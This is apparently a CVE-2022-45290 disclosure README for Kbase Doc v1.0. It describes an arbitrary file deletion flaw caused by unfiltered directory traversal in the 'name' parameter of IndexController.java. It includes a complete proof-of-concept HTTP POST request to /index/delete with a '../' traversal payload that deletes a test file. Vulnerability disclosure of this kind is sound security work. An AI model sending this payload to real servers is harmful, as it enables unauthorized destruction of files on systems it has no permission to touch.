Headline
CVE-2022-45290: KbaseDoc-v1.0-Arbitrary-file-deletion-vulnerability/README.md at main · HH1F/KbaseDoc-v1.0-Arbitrary-file-deletion-vulnerability
Kbase Doc v1.0 was discovered to contain an arbitrary file deletion vulnerability via the component /web/IndexController.java.
****KbaseDoc V1.0 has an arbitrary file deletion vulnerability******Description:**
Kbase doc has an arbitrary file deletion vulnerability in src/main/java/com/eastrobot/doc/web/IndexController.java
Source code download address: https://github.com/ekoz/kbase-doc
Version: 1.0
Vulnerability analysis:
Locate the location where the vulnerability exists: src/main/java/com/eastrobot/doc/web/IndexController.java
The POST request gets the name parameter,Since there is no filtering,As a result, parameters such as …/ can be spliced,Causes directory traversal,Because deletion is involved,Resulting in arbitrary file deletion vulnerability.
Recurrence of vulnerability
Download the source code and build the local environment
Create a poc.txt file in the kbase-doc-master\target\classes directory .
Use burpsuite to construct the following request.
[+] POC:
POST /index/delete HTTP/1.1
Host: test:8081
Content-Length: 22
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: chrome-extension://coohjcphdfgbiolnekdpbcijmhambjff
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie:__utma=71411734.247469081.1654064241.1654064241.1654064241.1; __utmz=71411734.1654064241.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Connection: close
name=..%2F..%2Fpoc.txt
It is found that poc.txt is deleted.
Proof and Exploit:
href